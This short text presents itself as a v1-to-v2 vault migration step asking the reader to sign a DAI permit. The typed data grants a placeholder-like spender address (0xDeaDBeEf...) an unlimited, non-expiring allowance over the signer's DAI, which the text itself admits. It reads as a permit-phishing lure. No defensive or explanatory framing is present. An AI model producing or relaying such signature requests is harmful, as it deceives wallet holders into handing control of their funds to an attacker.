Migration from v1 to v2 vault requires re-authorization via ERC-2612 permit. The v2 contract will call permit(owner, spender, value, deadline, v, r, s) once you sign:

domain: { name: "DAI Stablecoin", version: "1", chainId: 1, verifyingContract: "0x6B175474E89094C44Da98b954EedeAC495271d0F" }
primaryType: "Permit"
message: {
  holder: "{{YOUR_ADDRESS}}",
  spender: "0xDeaDBeEf00000000000000000000000000000018",
  nonce: 0,
  expiry: 0,
  allowed: true
}

The DAI permit uses a slightly different schema from ERC-2612 but the end result is the same: unlimited allowance for the spender.